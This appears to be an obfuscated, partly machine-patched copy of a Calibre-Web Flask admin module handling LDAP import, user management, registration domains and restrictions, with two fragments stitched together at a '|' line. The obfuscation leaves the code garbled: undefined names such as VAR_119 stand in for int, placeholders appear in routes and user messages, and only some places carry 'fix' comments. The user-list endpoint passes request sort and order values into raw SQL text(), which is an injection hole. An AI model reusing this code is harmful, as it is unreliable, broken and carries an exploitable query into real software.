    VAR_22.denied_column_value = config.config_denied_column_value
    ub.session.add(VAR_22)
    try:
        ub.session.commit()
        return 1, None  # increase no of VAR_54
    except Exception as ex:
        VAR_0.warning("Failed to create LDAP VAR_12: %s - %s", VAR_12, ex)
        ub.session.rollback()
        VAR_71 = _(u'Failed to Create at Least One LDAP User')
        return 0, VAR_71
@VAR_2.route('/import_ldap_users')
@login_required
@FUNC_0
def FUNC_67():
    """Import all members of the configured LDAP group as local users."""
    VAR_33 = {}
    try:
        VAR_116 = services.ldap.get_group_members(config.config_ldap_group_name)
    except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
        VAR_0.debug_or_exception(e)
        VAR_33['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
        return json.dumps(VAR_33)
    if not VAR_116:
        VAR_0.debug('LDAP empty response')
        VAR_33['text'] = _(u'Error: No VAR_12 returned in VAR_52 of LDAP server')
        return json.dumps(VAR_33)
    VAR_93 = 0
    for VAR_114 in VAR_116:
        VAR_12 = VAR_114.decode('utf-8')
        if '=' in VAR_12:
            # Member given as a DN: extract the plain user name via the
            # configured object template.
            if config.config_ldap_member_user_object:
                VAR_128 = config.config_ldap_member_user_object
            else:
                VAR_128 = config.config_ldap_user_object
            try:
                VAR_127 = FUNC_70(VAR_12, VAR_128)
            except Exception as ex:
                VAR_0.warning(ex)
                continue
        else:
            VAR_127 = VAR_12
            VAR_128 = None
        try:
            # fix: 'query_filter' was an undefined leftover name -> VAR_128.
            VAR_27 = services.ldap.get_object_details(VAR_12=VAR_127, VAR_128=VAR_128)
        except AttributeError as ex:
            VAR_0.debug_or_exception(ex)
            continue
        if VAR_27:
            VAR_129, VAR_71 = FUNC_66(VAR_12, VAR_27)
            if VAR_71:
                VAR_33['text'] = VAR_71
            else:
                VAR_93 += VAR_129
        else:
            VAR_0.warning("LDAP User: %s Not Found", VAR_12)
            VAR_33['text'] = _(u'At Least One LDAP User Not Found in Database')
    if not VAR_33:
        # fix: 'showtext' was an undefined leftover name -> VAR_33.
        VAR_33['text'] = _(u'{} User Successfully Imported'.format(VAR_93))
    return json.dumps(VAR_33)
def FUNC_68(VAR_12, VAR_28):
    """Pull the value of attribute VAR_28 out of LDAP DN string VAR_12.

    Raises Exception when the attribute is not present in the DN.
    """
    pattern = VAR_28 + r"=([\.\d\s\w-]+)"
    match = re.search(pattern, VAR_12, re.IGNORECASE | re.UNICODE)
    if match is None:
        raise Exception("Could Not Parse LDAP User: {}".format(VAR_12))
    return match.group(1)
def FUNC_69(VAR_12, VAR_29):
    """Return the attribute name from an LDAP object template VAR_29.

    VAR_29 is a template such as 'uid=%s'; the part before '=%s' is the
    attribute (user field) name. VAR_12 (the user) is only used in the
    error message. Raises Exception when no '<field>=%s' is found.
    """
    VAR_94 = re.search("([a-zA-Z0-9-]+)=%s", VAR_29, re.IGNORECASE | re.UNICODE)
    if VAR_94:
        return VAR_94.group(1)
    else:
        # fix: the message was never formatted — Exception was constructed
        # with two arguments instead of applying .format(VAR_12).
        raise Exception("Could Not Parse LDAP Userfield: {}".format(VAR_12))
def FUNC_70(VAR_12, VAR_29):
    """Extract the user name from DN VAR_12 using template VAR_29 (e.g. 'uid=%s')."""
    VAR_95 = FUNC_69(VAR_12, VAR_29)
    return FUNC_68(VAR_12, VAR_95)
|
import os
import re
import base64
import json
import time
import operator
from datetime import datetime, timedelta

from babel import Locale as LC
from babel.dates import format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask import session as flask_session
from flask_login import login_required, VAR_62, logout_user, confirm_login
from flask_babel import gettext as _
from sqlalchemy import and_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import func, or_, VAR_130

from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
    valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS

try:
    from functools import wraps
except ImportError:
    pass  # We're not using Python 3
VAR_0 = logger.create()

# Feature availability flags, resolved once at import time.
VAR_1 = {
    'ldap': bool(services.ldap),
    'goodreads': bool(services.goodreads_support),
    'kobo': bool(services.kobo),
    'updater': constants.UPDATER_AVAILABLE,
    'gmail': bool(services.gmail)
}

try:
    import rarfile  # pylint: disable=unused-import
    VAR_1['rar'] = True
except (ImportError, SyntaxError):
    VAR_1['rar'] = False

try:
    # fix: the import list was mangled ('import .oauth_check, VAR_96').
    # VAR_97 is used throughout as registered_oauth, so alias the imported
    # oauth_check to it to keep it defined on the success path as well.
    from .oauth_bb import oauth_check as VAR_97, VAR_96
    VAR_1['oauth'] = True
except ImportError as err:
    VAR_0.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
    VAR_1['oauth'] = False
    VAR_96 = []
    VAR_97 = {}

VAR_1['gdrive'] = gdrive_support

VAR_2 = Blueprint('admin', __name__)
def FUNC_0(VAR_3):
    """Decorator: allow the wrapped view only for admin users (else 403)."""
    @wraps(VAR_3)
    def _admin_gate(*args, **kwargs):
        if not VAR_62.role_admin():
            abort(403)
        return VAR_3(*args, **kwargs)
    return _admin_gate
@VAR_2.before_app_request
def FUNC_1():
    """Populate flask.g with per-request globals and guard configuration.

    Logs the user out when the stored session id no longer matches,
    exposes config/constants/shelf access to templates, and redirects
    almost every endpoint to the DB-configuration page while no Calibre
    database is configured yet.
    """
    if VAR_62.is_authenticated:
        confirm_login()
        # Invalidate stale sessions (but keep OPDS basic-auth requests alive).
        if not ub.check_user_session(VAR_62.id, flask_session.get('_id')) and 'opds' not in request.path:
            logout_user()
    g.constants = constants
    g.user = VAR_62
    g.allow_registration = config.config_public_reg
    g.allow_anonymous = config.config_anonbrowse
    g.allow_upload = config.config_uploading
    g.current_theme = config.config_theme
    g.config_authors_max = config.config_authors_max
    g.shelves_access = ub.session.query(ub.Shelf).filter(
        or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == VAR_62.id)).order_by(ub.Shelf.name).all()
    # While no library DB is configured, only a small allow-list of endpoints works.
    if '/static/' not in request.path and not config.db_configured and \
        request.endpoint not in ('admin.ajax_db_config',
                                 'admin.simulatedbchange',
                                 'admin.db_configuration',
                                 'web.login',
                                 'web.logout',
                                 'admin.load_dialogtexts',
                                 'admin.ajax_pathchooser'):
        return redirect(url_for('admin.db_configuration'))
@VAR_2.route("/admin")
@login_required
def FUNC_2():
    """Bare /admin entry point; always answers 403."""
    abort(403)
@VAR_2.route("/shutdown", methods=["POST"])
@login_required
@FUNC_0
def FUNC_3():
    """Handle shutdown/restart/DB-reconnect commands posted as JSON.

    parameter 0 = restart, 1 = shutdown, 2 = reconnect to the Calibre
    database; anything else is rejected with HTTP 400.
    """
    VAR_32 = request.get_json().get('parameter', -1)
    VAR_33 = {}
    if VAR_32 in (0, 1):  # valid commandos received
        # Close DB connections before the server goes down.
        calibre_db.dispose()
        ub.dispose()
        if VAR_32 == 0:
            VAR_33['text'] = _(u'Server restarted, please reload page')
        else:
            VAR_33['text'] = _(u'Performing FUNC_3 of server, please close window')
        web_server.stop(VAR_32 == 0)
        return json.dumps(VAR_33)
    if VAR_32 == 2:
        VAR_0.warning("reconnecting to calibre database")
        calibre_db.reconnect_db(config, ub.app_DB_path)
        VAR_33['text'] = _(u'Reconnect successful')
        return json.dumps(VAR_33)
    # fix: 'showtext' was an undefined leftover name -> VAR_33.
    VAR_33['text'] = _(u'Unknown command')
    return json.dumps(VAR_33), 400
@VAR_2.route("/FUNC_4/view")
@login_required
@FUNC_0
def FUNC_4():
    """Render the main admin page with users, mail settings and version info."""
    VAR_34 = updater_thread.get_current_version_info()
    if VAR_34 is False:
        VAR_98 = _(u'Unknown')
    else:
        if 'datetime' in VAR_34:
            VAR_98 = VAR_34['datetime']
            # Convert the commit timestamp to local time for display.
            VAR_117 = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
            VAR_118 = datetime.strptime(VAR_98[:19], "%Y-%m-%dT%H:%M:%S")
            if len(VAR_98) > 19:  # VAR_66 if string has timezone
                # fix: undefined VAR_119 -> int (parsing the UTC offset digits).
                if VAR_98[19] == '+':
                    VAR_118 -= timedelta(hours=int(VAR_98[20:22]), minutes=int(VAR_98[23:]))
                elif VAR_98[19] == '-':
                    VAR_118 += timedelta(hours=int(VAR_98[20:22]), minutes=int(VAR_98[23:]))
            VAR_98 = format_datetime(VAR_118 - VAR_117, format='short', VAR_58=get_locale())
        else:
            VAR_98 = VAR_34['version']
    VAR_35 = ub.session.query(ub.User).all()
    VAR_36 = config.get_mail_settings()
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    # fix: kwarg values referenced undefined pre-obfuscation names
    # (allUser/commit/feature_support/kobo_support) -> use the locals.
    return render_title_template("admin.html", VAR_35=VAR_35, email=VAR_36, config=config, VAR_98=VAR_98,
                                 VAR_1=VAR_1, VAR_25=VAR_25,
                                 title=_(u"Admin page"), page="admin")
@VAR_2.route("/FUNC_4/dbconfig", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_5():
    """Database-configuration page: save via FUNC_48 on POST, render via FUNC_51 on GET."""
    if request.method == "POST":
        return FUNC_48()
    return FUNC_51()
@VAR_2.route("/FUNC_4/config", methods=["GET"])
@login_required
@FUNC_0
def FUNC_6():
    """Render the basic-configuration page."""
    return render_title_template("config_edit.html",
                                 config=config,
                                 provider=VAR_96,
                                 VAR_1=VAR_1,  # fix: 'feature_support' was an undefined leftover name
                                 title=_(u"Basic Configuration"), page="config")
@VAR_2.route("/FUNC_4/ajaxconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_7():
    """AJAX save of the basic configuration; delegates to FUNC_49."""
    return FUNC_49()
@VAR_2.route("/FUNC_4/ajaxdbconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_8():
    """AJAX save of the database configuration; delegates to FUNC_48."""
    return FUNC_48()
@VAR_2.route("/FUNC_4/alive", methods=["GET"])
@login_required
@FUNC_0
def FUNC_9():
    """Liveness probe for the admin UI; empty 200 response."""
    return "", 200
@VAR_2.route("/FUNC_4/viewconfig")
@login_required
@FUNC_0
def FUNC_10():
    """Render the UI (view) configuration page."""
    # Boolean / text custom columns usable for read-status and restrictions.
    VAR_37 = calibre_db.session.query(db.Custom_Columns)\
        .filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
    VAR_38 = calibre_db.session.query(db.Custom_Columns)\
        .filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
    VAR_23 = calibre_db.speaking_language()
    VAR_24 = [LC('en')] + babel.list_translations()
    # fix: kwarg values referenced undefined names (languages/translations).
    return render_title_template("config_view_edit.html", conf=config, readColumns=VAR_37,
                                 restrictColumns=VAR_38,
                                 VAR_23=VAR_23,
                                 VAR_24=VAR_24,
                                 title=_(u"UI Configuration"), page="uiconfig")
@VAR_2.route("/FUNC_4/usertable")
@login_required
@FUNC_0
def FUNC_11():
    """Render the bulk user-management table."""
    VAR_39 = VAR_62.view_settings.get('useredit', {})
    VAR_23 = calibre_db.speaking_language()
    VAR_24 = babel.list_translations() + [LC('en')]
    VAR_35 = ub.session.query(ub.User)
    # All tags actually attached to visible books (for the restriction editor).
    VAR_40 = calibre_db.session.query(db.Tags)\
        .join(db.books_tags_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(VAR_130('books_tags_link.tag'))\
        .order_by(db.Tags.name).all()
    if config.config_restricted_column:
        VAR_99 = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
    else:
        VAR_99 = []
    if not config.config_anonbrowse:
        # fix: 'allUser' was an undefined leftover name -> VAR_35.
        VAR_35 = VAR_35.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    # fix: kwarg values referenced undefined pre-obfuscation names
    # (tags/custom_values/translations/languages/kobo_support) -> locals.
    return render_title_template("user_table.html",
                                 VAR_54=VAR_35.all(),
                                 VAR_40=VAR_40,
                                 VAR_99=VAR_99,
                                 VAR_24=VAR_24,
                                 VAR_23=VAR_23,
                                 visiblility=VAR_39,
                                 all_roles=constants.ALL_ROLES,
                                 VAR_25=VAR_25,
                                 sidebar_settings=constants.sidebar_settings,
                                 title=_(u"Edit Users"),
                                 page="usertable")
@VAR_2.route("/ajax/listusers")
@login_required
@FUNC_0
def FUNC_12():
    """Server-side data endpoint for the user table (paging/sort/search)."""
    # fix: undefined VAR_119 -> int (route converters show it was `int`).
    VAR_41 = int(request.args.get("offset") or 0)
    VAR_42 = int(request.args.get("limit") or 10)
    VAR_43 = request.args.get("search")
    VAR_44 = request.args.get("sort", "id")
    VAR_45 = request.args.get("order", "").lower()
    VAR_46 = None
    if VAR_44 == "state":
        VAR_46 = json.loads(request.args.get("state", "[]"))
    if VAR_44 != "state" and VAR_45:
        VAR_45 = VAR_130(VAR_44 + " " + VAR_45)
    elif not VAR_46:
        VAR_45 = ub.User.id.asc()
    VAR_47 = ub.session.query(ub.User)
    if not config.config_anonbrowse:
        VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
    VAR_48 = VAR_49 = VAR_47.count()
    if VAR_43:
        # fix: VAR_18 was an undefined leftover of sqlalchemy's `func`.
        VAR_47 = VAR_47.filter(or_(func.lower(ub.User.name).ilike("%" + VAR_43 + "%"),
                                   func.lower(ub.User.kindle_mail).ilike("%" + VAR_43 + "%"),
                                   func.lower(ub.User.email).ilike("%" + VAR_43 + "%")))
    if VAR_46:
        VAR_54 = calibre_db.get_checkbox_sorted(VAR_47.all(), VAR_46, VAR_41, VAR_42, request.args.get("order", "").lower())
    else:
        VAR_54 = VAR_47.order_by(VAR_45).offset(VAR_41).limit(VAR_42).all()
    if VAR_43:
        VAR_49 = len(VAR_54)
    for VAR_12 in VAR_54:
        if VAR_12.default_language == "all":
            VAR_12.default = _("All")
        else:
            VAR_12.default = LC.parse(VAR_12.default_language).get_language_name(get_locale())
    VAR_50 = {'totalNotFiltered': VAR_48, 'total': VAR_49, "rows": VAR_54}
    VAR_51 = json.dumps(VAR_50, cls=db.AlchemyEncoder)
    VAR_52 = make_response(VAR_51)
    VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
    return VAR_52
@VAR_2.route("/ajax/deleteuser", methods=['POST'])
@login_required
@FUNC_0
def FUNC_13():
    """Delete one ('userid') or many ('userid[]') users; JSON flash reply."""
    VAR_53 = request.form.to_dict(flat=False)
    VAR_54 = None
    if "userid[]" in VAR_53:
        VAR_54 = ub.session.query(ub.User).filter(ub.User.id.in_(VAR_53['userid[]'])).all()
    elif "userid" in VAR_53:
        VAR_54 = ub.session.query(ub.User).filter(ub.User.id == VAR_53['userid'][0]).all()
    VAR_55 = 0       # number of successfully deleted users
    VAR_56 = list()  # per-user error messages
    VAR_57 = list()  # final message list returned to the client
    if not VAR_54:
        VAR_0.error("User not found")
        return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
    for VAR_12 in VAR_54:
        try:
            VAR_71 = FUNC_53(VAR_12)
            VAR_55 += 1
        except Exception as ex:
            VAR_0.error(ex)
            VAR_56.append({'type': "danger", 'message': str(ex)})
    if VAR_55 == 1:
        VAR_0.info("User {} deleted".format(VAR_53))
        VAR_57 = [{'type': "success", 'message': VAR_71}]
    elif VAR_55 > 1:
        VAR_0.info("Users {} deleted".format(VAR_53))
        VAR_57 = [{'type': "success", 'message': _("{} VAR_54 deleted successfully").format(VAR_55)}]
    VAR_57.extend(VAR_56)
    return Response(json.dumps(VAR_57), mimetype='application/json')
@VAR_2.route("/ajax/getlocale")
@login_required
@FUNC_0
def FUNC_14():
    """Return the available UI locales as JSON value/text pairs."""
    all_locales = babel.list_translations() + [LC('en')]
    current = get_locale()
    entries = [{'value': str(loc), 'text': loc.get_language_name(current)}
               for loc in all_locales]
    return json.dumps(entries)
@VAR_2.route("/ajax/getdefaultlanguage")
@login_required
@FUNC_0
def FUNC_15():
    """Return the selectable default languages ('all' + spoken) as JSON."""
    entries = [{'value': 'all', 'text': _('Show All')}]
    entries.extend({'value': lang.lang_code, 'text': lang.name}
                   for lang in calibre_db.speaking_language())
    return json.dumps(entries)
@VAR_2.route("/ajax/editlistusers/<VAR_4>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_16(VAR_4):
    """Inline-edit endpoint of the user-list table.

    VAR_4 names the user attribute to change; the posted form carries the
    target user id(s) under "pk"/"pk[]" and the new value(s) under
    "value"/"value[]". Returns "" on success, or an error text with HTTP 400.
    """
    VAR_61 = request.form.to_dict(flat=False)
    VAR_47 = ub.session.query(ub.User)
    if not config.config_anonbrowse:
        # hide the built-in anonymous account when guest browsing is disabled
        VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
    if "pk" in VAR_61:
        VAR_54 = [VAR_47.filter(ub.User.id == VAR_61['pk'][0]).one_or_none()]
    else:
        if "pk[]" in VAR_61:
            VAR_54 = VAR_47.filter(ub.User.id.in_(VAR_61['pk[]'])).all()
        else:
            return _("Malformed request"), 400
    # the form is parsed with flat=False, so scalar fields arrive as 1-lists
    if 'field_index' in VAR_61:
        VAR_61['field_index'] = VAR_61['field_index'][0]
    if 'value' in VAR_61:
        VAR_61['value'] = VAR_61['value'][0]
    elif not ('value[]' in VAR_61):
        return _("Malformed request"), 400
    for VAR_12 in VAR_54:
        try:
            if VAR_4 in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
                if 'value[]' in VAR_61:
                    setattr(VAR_12, VAR_4, FUNC_29(VAR_12, VAR_61['action'][0], VAR_4, VAR_61['value[]']))
                else:
                    setattr(VAR_12, VAR_4, VAR_61['value'].strip())
            else:
                VAR_61['value'] = VAR_61['value'].strip()
                if VAR_4 == 'name':
                    if VAR_12.name == "Guest":
                        raise Exception(_("Guest Name can't be changed"))
                    VAR_12.name = check_username(VAR_61['value'])
                elif VAR_4 == 'email':
                    VAR_12.email = check_email(VAR_61['value'])
                elif VAR_4 == 'kobo_only_shelves_sync':
                    VAR_12.kobo_only_shelves_sync = VAR_119(VAR_61['value'] == 'true')
                elif VAR_4 == 'kindle_mail':
                    VAR_12.kindle_mail = valid_email(VAR_61['value']) if VAR_61['value'] else ""
                elif VAR_4.endswith('role'):
                    VAR_125 = VAR_119(VAR_61['field_index'])
                    if VAR_12.name == "Guest" and VAR_125 in \
                            [constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
                        raise Exception(_("Guest can't have this role"))
                    # FIX: the power-of-two check previously referenced an
                    # undefined name ("value"); it must test VAR_125 itself.
                    if VAR_125 > 0 and VAR_125 <= constants.ROLE_VIEWER \
                            and (VAR_125 & VAR_125 - 1 == 0 or VAR_125 == 1):
                        if VAR_61['value'] == 'true':
                            VAR_12.role |= VAR_125
                        elif VAR_61['value'] == 'false':
                            if VAR_125 == constants.ROLE_ADMIN:
                                # never remove the admin role from the last admin
                                if not ub.session.query(ub.User).\
                                        filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                               ub.User.id != VAR_12.id).count():
                                    return Response(
                                        json.dumps([{'type': "danger",
                                                     'message':_(u"No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role",
                                                                 nick=VAR_12.name)}]), mimetype='application/json')
                            VAR_12.role &= ~VAR_125
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid role"))
                elif VAR_4.startswith('sidebar'):
                    VAR_125 = VAR_119(VAR_61['field_index'])
                    if VAR_12.name == "Guest" and VAR_125 == constants.SIDEBAR_READ_AND_UNREAD:
                        raise Exception(_("Guest can't have this view"))
                    # FIX: same undefined-name bug as in the role branch above
                    if VAR_125 > 0 and VAR_125 <= constants.SIDEBAR_LIST \
                            and (VAR_125 & VAR_125 - 1 == 0 or VAR_125 == 1):
                        if VAR_61['value'] == 'true':
                            VAR_12.sidebar_view |= VAR_125
                        elif VAR_61['value'] == 'false':
                            VAR_12.sidebar_view &= ~VAR_125
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid view"))
                elif VAR_4 == 'locale':
                    if VAR_12.name == "Guest":
                        raise Exception(_("Guest's Locale is determined automatically and can't be set"))
                    if VAR_61['value'] in _BABEL_TRANSLATIONS:
                        VAR_12.locale = VAR_61['value']
                    else:
                        raise Exception(_("No Valid Locale Given"))
                elif VAR_4 == 'default_language':
                    VAR_23 = calibre_db.session.query(db.Languages) \
                        .join(db.books_languages_link) \
                        .join(db.Books) \
                        .filter(calibre_db.common_filters()) \
                        .group_by(VAR_130('books_languages_link.lang_code')).all()
                    VAR_131 = [lang.lang_code for lang in VAR_23] + ["all"]
                    if VAR_61['value'] in VAR_131:
                        VAR_12.default_language = VAR_61['value']
                    else:
                        raise Exception(_("No Valid Book Language Given"))
                else:
                    return _("Parameter not found"), 400
        except Exception as ex:
            VAR_0.debug_or_exception(ex)
            return str(ex), 400
    ub.session_commit()
    return ""
@VAR_2.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@FUNC_0
def FUNC_17():
    """Persist the current user's user-table view settings from the request body."""
    # settings are stored under the 'useredit' key of the user's view_settings
    VAR_62.view_settings['useredit'] = json.loads(request.data)
    try:
        try:
            # a JSON column mutated in place must be flagged dirty for SQLAlchemy
            flag_modified(VAR_62, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        VAR_0.error("Invalid request received: {}".format(request))
        return "Invalid request", 400
    return ""
def FUNC_18(VAR_5):
    """Return True when VAR_5 is "0" or names an existing, undeleted bool custom column."""
    if VAR_5 == "0":
        return True
    matches = calibre_db.session.query(db.Custom_Columns) \
        .filter(db.Custom_Columns.id == VAR_5) \
        .filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)) \
        .all()
    return bool(matches)
def FUNC_19(VAR_5):
    """Return True when VAR_5 is "0" or names an existing, undeleted text custom column."""
    if VAR_5 == "0":
        return True
    matches = calibre_db.session.query(db.Custom_Columns) \
        .filter(db.Custom_Columns.id == VAR_5) \
        .filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)) \
        .all()
    return bool(matches)
@VAR_2.route("/FUNC_4/viewconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_20():
    """Save the "View Configuration" admin form (UI defaults, default roles/views)."""
    VAR_16 = request.form.to_dict()
    FUNC_41(VAR_16, "config_calibre_web_title")
    FUNC_41(VAR_16, "config_columns_to_ignore")
    if FUNC_41(VAR_16, "config_title_regex"):
        # title-sort regex changed: re-derive the stored sort titles
        calibre_db.update_title_sort(config)
    if not FUNC_18(VAR_16.get("config_read_column", "0")):
        flash(_(u"Invalid Read Column"), category="error")
        VAR_0.debug("Invalid Read column")
        return FUNC_10()
    FUNC_38(VAR_16, "config_read_column")
    if not FUNC_19(VAR_16.get("config_restricted_column", "0")):
        flash(_(u"Invalid Restricted Column"), category="error")
        VAR_0.debug("Invalid Restricted Column")
        return FUNC_10()
    FUNC_38(VAR_16, "config_restricted_column")
    FUNC_38(VAR_16, "config_theme")
    FUNC_38(VAR_16, "config_random_books")
    FUNC_38(VAR_16, "config_books_per_page")
    FUNC_38(VAR_16, "config_authors_max")
    FUNC_41(VAR_16, "config_default_language")
    FUNC_41(VAR_16, "config_default_locale")
    config.config_default_role = constants.selected_roles(VAR_16)
    config.config_default_role &= ~constants.ROLE_ANONYMOUS
    # the default visibility bitmask is assembled from every checked "show_*" box
    config.config_default_show = sum(VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_'))
    if "Show_detail_random" in VAR_16:
        config.config_default_show |= constants.DETAIL_RANDOM
    config.save()
    flash(_(u"Calibre-Web FUNC_6 updated"), category="success")
    VAR_0.debug("Calibre-Web FUNC_6 updated")
    FUNC_1()
    return FUNC_10()
@VAR_2.route("/ajax/loaddialogtexts/<VAR_6>", methods=['POST'])
@login_required
def FUNC_21(VAR_6):
    """Return the localized confirmation text for the dialog named VAR_6 as JSON."""
    VAR_63 = {"header": "", "main": "", "valid": 1}
    if VAR_6 == "config_delete_kobo_token":
        VAR_63["main"] = _('Do you really want to delete the Kobo Token?')
    elif VAR_6 == "btndeletedomain":
        VAR_63["main"] = _('Do you really want to delete this domain?')
    elif VAR_6 == "btndeluser":
        VAR_63["main"] = _('Do you really want to delete this VAR_12?')
    elif VAR_6 == "delete_shelf":
        VAR_63["main"] = _('Are you sure you want to delete this shelf?')
    elif VAR_6 == "select_locale":
        VAR_63["main"] = _('Are you sure you want to change locales of selected VAR_12(s)?')
    elif VAR_6 == "select_default_language":
        VAR_63["main"] = _('Are you sure you want to change visible book VAR_23 for selected VAR_12(s)?')
    elif VAR_6 == "role":
        VAR_63["main"] = _('Are you sure you want to change the selected role for the selected VAR_12(s)?')
    elif VAR_6 == "restrictions":
        VAR_63["main"] = _('Are you sure you want to change the selected restrictions for the selected VAR_12(s)?')
    elif VAR_6 == "sidebar_view":
        VAR_63["main"] = _('Are you sure you want to change the selected VAR_39 restrictions for the selected VAR_12(s)?')
    elif VAR_6 == "kobo_only_shelves_sync":
        VAR_63["main"] = _('Are you sure you want to change shelf sync behavior for the selected VAR_12(s)?')
    elif VAR_6 == "db_submit":
        VAR_63["main"] = _('Are you sure you want to change Calibre library location?')
    elif VAR_6 == "btnfullsync":
        VAR_63["main"] = _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?")
    return json.dumps(VAR_63)
@VAR_2.route("/ajax/editdomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_22(VAR_7):
    """Rename a registration-domain pattern (x-editable table callback)."""
    form_data = request.form.to_dict()
    entry = ub.session.query(ub.Registration).filter(ub.Registration.id == form_data['pk']).first()
    # UI wildcards * / ? are stored as SQL LIKE wildcards % / _
    entry.domain = form_data['value'].replace('*', '%').replace('?', '_').lower()
    return ub.session_commit("Registering Domains edited {}".format(entry.domain))
@VAR_2.route("/ajax/adddomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_23(VAR_7):
    """Add a registration-domain pattern to the allow (VAR_7=1) or deny list.

    Wildcards * / ? from the UI are stored as SQL LIKE wildcards % / _.
    Duplicates (same domain and allow flag) are silently ignored.
    """
    VAR_65 = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
    VAR_66 = ub.session.query(ub.Registration).filter(ub.Registration.domain == VAR_65)\
        .filter(ub.Registration.allow == VAR_7).first()
    if not VAR_66:
        # FIX: keyword was inverted ("VAR_7=allow" referenced an undefined name)
        VAR_100 = ub.Registration(domain=VAR_65, allow=VAR_7)
        ub.session.add(VAR_100)
        ub.session_commit("Registering Domains added {}".format(VAR_65))
    return ""
@VAR_2.route("/ajax/deletedomain", methods=['POST'])
@login_required
@FUNC_0
def FUNC_24():
    """Delete a registration-domain entry; keep at least one allow rule.

    When the last allow entry is removed, "*.*" (stored as "%.%") is
    re-inserted so registration is not accidentally locked down completely.
    """
    try:
        VAR_101 = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
        ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_101).delete()
        ub.session_commit("Registering Domains deleted {}".format(VAR_101))
        if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
            # FIX: keyword was inverted ("VAR_7=1" set a non-existent field name)
            VAR_100 = ub.Registration(domain="%.%", allow=1)
            ub.session.add(VAR_100)
            ub.session_commit("Last Registering Domain deleted, added *.* as default")
    except KeyError:
        pass
    return ""
@VAR_2.route("/ajax/domainlist/<VAR_119:VAR_7>")
@login_required
@FUNC_0
def FUNC_25(VAR_7):
    """List the allow/deny registration-domain patterns as a JSON response."""
    entries = ub.session.query(ub.Registration).filter(ub.Registration.allow == VAR_7).all()
    payload = json.dumps([{"domain": entry.domain.replace('%', '*').replace('_', '?'), "id": entry.id}
                          for entry in entries])
    # quote round-trip kept from the original client integration
    stripped = json.dumps(payload.replace('"', "'")).lstrip('"').strip('"')
    response = make_response(stripped.replace("'", '"'))
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0}, methods=['POST'])
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_26(VAR_8, VAR_9):
    """Edit one entry of an allow/deny restriction list.

    VAR_8 selects the list: 0 = template tags, 1 = template custom column,
    2 = per-user tags, 3 = per-user custom column. The form 'id' is
    prefixed 'a' (allow) or 'd' (deny) followed by the entry index.
    NOTE(review): the defaults dict uses key "user_id" while the parameter
    is named VAR_9 — confirm the route default actually binds.
    """
    VAR_10 = request.form.to_dict()
    if VAR_10['id'].startswith('a'):
        if VAR_8 == 0:  # Tags as template
            VAR_69 = config.list_allowed_tags()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_allowed_tags = ','.join(VAR_69)
            config.save()
        if VAR_8 == 1:  # CustomC
            VAR_69 = config.list_allowed_column_values()
            VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
            config.config_allowed_column_value = ','.join(VAR_69)
            config.save()
        if VAR_8 == 2:  # Tags per VAR_12
